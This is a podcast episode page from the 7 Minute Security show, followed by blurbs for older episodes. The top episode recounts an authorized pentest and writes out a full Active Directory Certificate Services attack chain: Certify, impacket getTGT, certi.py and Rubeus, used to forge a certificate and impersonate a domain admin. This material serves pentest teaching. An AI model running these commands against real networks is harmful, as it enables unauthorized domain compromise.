7MS #501: Tales of Pentest Pwnage - Part 31
7 Minute Security29 Joulu 2021

7MS #501: Tales of Pentest Pwnage - Part 31

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:

Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed:

msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:

sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME

From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:

rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER

And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!

Jaksot(683)

7MS #146: Friday Infosec News and Links Roundup

7MS #146: Friday Infosec News and Links Roundup

Here are some of my favorite stories and links for this week! If you missed last week's BURN IT ALL! Webcast, it's now online as a Youtube video. There is still time to register for the Real World Web Penetration Testing Webinar. It's(Thursday, January 28 @ 1 p.m. CST) and $25 (cheap!) Trustwave is in big trouble after failing to find hackers under their noses. Their noses mustreally hurt because Mandiant was quick to point out the work done by Trustwave was "woefully inadequate." I'm scared of IoT stuff. Why? Oh, I don't know, because what happens when your Nest fails and leaves your buttcheeks freezing cold?!?!? Or what if hackers steal your doorbell, and thus your wifi password and pwn your network? Thankfully, OWASP now now has a top 10 for IoT stuff too. A researcher found some clever ways to abuse Lastpass with an exploit called Lostpass. Lastpassresponded with a security change wherein a Lastpass authentication from a new device requires approval via email. A new Sysinternals tool helps figure out if you have shady, unsigned files in c:\windows\system32. Oh, and for sure upgrade all your iThings ASAP. Apple patched some ugly security holes.

23 Tammi 201610min

7MS #145: OFF-TOPIC - Sicario and The Walk

7MS #145: OFF-TOPIC - Sicario and The Walk

In today's off-topic episode I review two movies: Sicario and The Walk.

21 Tammi 20167min

7MS #144: Shoulder-Surfing with Seasoned Pentesters

7MS #144: Shoulder-Surfing with Seasoned Pentesters

I recently had the opportunity to shoulder-surf with some seasoned Webapp pentesters, and wanted to share what I learned about their tools, techniques and methodologies.

18 Tammi 20167min

7MS #143: Friday Infosec News and Links Roundup

7MS #143: Friday Infosec News and Links Roundup

Here are some of my fav' stories and links for this week! * Burn it all...The New Security Fundamentals **(Wednesday, January 20 @ 1 p.m. CST)**: a free Webinar on setting up the "*core technical things you need to do for your security program*." I've attended many Webinars from the BHIS group and they're always informative and humorous. * Real World Web Penetration Testing **(Thursday, January 28 @ 1 p.m. CST)**: a $25 Webinar on going through "*a real world penetration test. We will explore the methodology and procedures Secure Ideas follows as we test web applications. The course will also walk through some tricks and tips on how to focus your testing on likely flaws*." I have seen four of their recorded courses before and found them to be *absolutely* worth the money I spent, so I'm confident this upcoming session will be no exception. * Fortinet SSH backdoor not much to say except if you use any of the affected products, update immediately as they contain an SSH backdoor: * FortiOS v4.3.17 or any later version of FortiOS v4.3 (available as of July 9, 2014) * FortiOS v5.0.8 or any later version of FortiOS v5.0 (available as of July 28, 2014) * Any version of FortiOS v5.2 or v5.4 * Hacker sentenced to 334 years in prison for operating a phishing Web site similar to that of a legit banking Web site. Moral of the story? Don't do that. * Don't use IE 8, 9 or 10 anymore! unless you like to live dangerously.

15 Tammi 20168min

7MS #142: OFF-TOPIC - Media Servers and Making a Murderer

7MS #142: OFF-TOPIC - Media Servers and Making a Murderer

This off-topic episode covers: * Media servers - I'm a newb in this area and could use your help in setting up a config that actually works! * Making a Murderer - this is a fantastic documentary on Netflix. Stop what you're doing (once you listen to this episode) and watch *immediately* please.

13 Tammi 20168min

7MS #141: Happy (Belated) New Year!

7MS #141: Happy (Belated) New Year!

Happy (belated) new year! This episode is more of a "What am I listening to, a PBS telethon?!" kind of thing, and I'm sorry for that. But I want to cover: * Scheduling changes for 2016 - we're gonna be 3 times a week! * A new documentation project I'm working on called BPATTY (Brian's Pentesting and Technical Tips for You) * A way you can support the podcast financially.

11 Tammi 20168min

7MS #140: OFF-TOPIC - Video Games I'm Currently Playing

7MS #140: OFF-TOPIC - Video Games I'm Currently Playing

This episode talks about some cool video games I've been playing lately: * Metal Gear Solid Phantom Pain (Xbox 360) * Rise of the Tomb Raider (Xbox 360) * Luminocity (iPhone) * Super Mario Maker (Wii U) I recommend 'em all!

8 Tammi 20169min

7MS #139: Securing Your Life - Part 2

7MS #139: Securing Your Life - Part 2

Back in episode #93 I talked about securing your life - in other words, asking yourself "What would happen if I was dead right now? Do I have adequate insurance? Are my finances in order? How about estate planning?" This episode continues that train of thought, and I share some new changes I've made in my "life security" department.

8 Tammi 20168min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
ootsa-kuullut-tasta-2
aikalisa
et-sa-noin-voi-sanoo-esittaa
otetaan-yhdet
politiikan-puskaradio
rss-vaalirankkurit-podcast
aihe
rikosmyytit
the-ulkopolitist
rss-mina-ukkola
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
rss-hyvaa-huomenta-bryssel
rss-kyselytunti
linda-maria
rss-aijat-hopottaa-podcast
rss-kovin-paikka
rss-kaikki-paskaksi-ystavat
rss-tyolinjalla-pekka-sauri
rss-raha-talous-ja-politiikka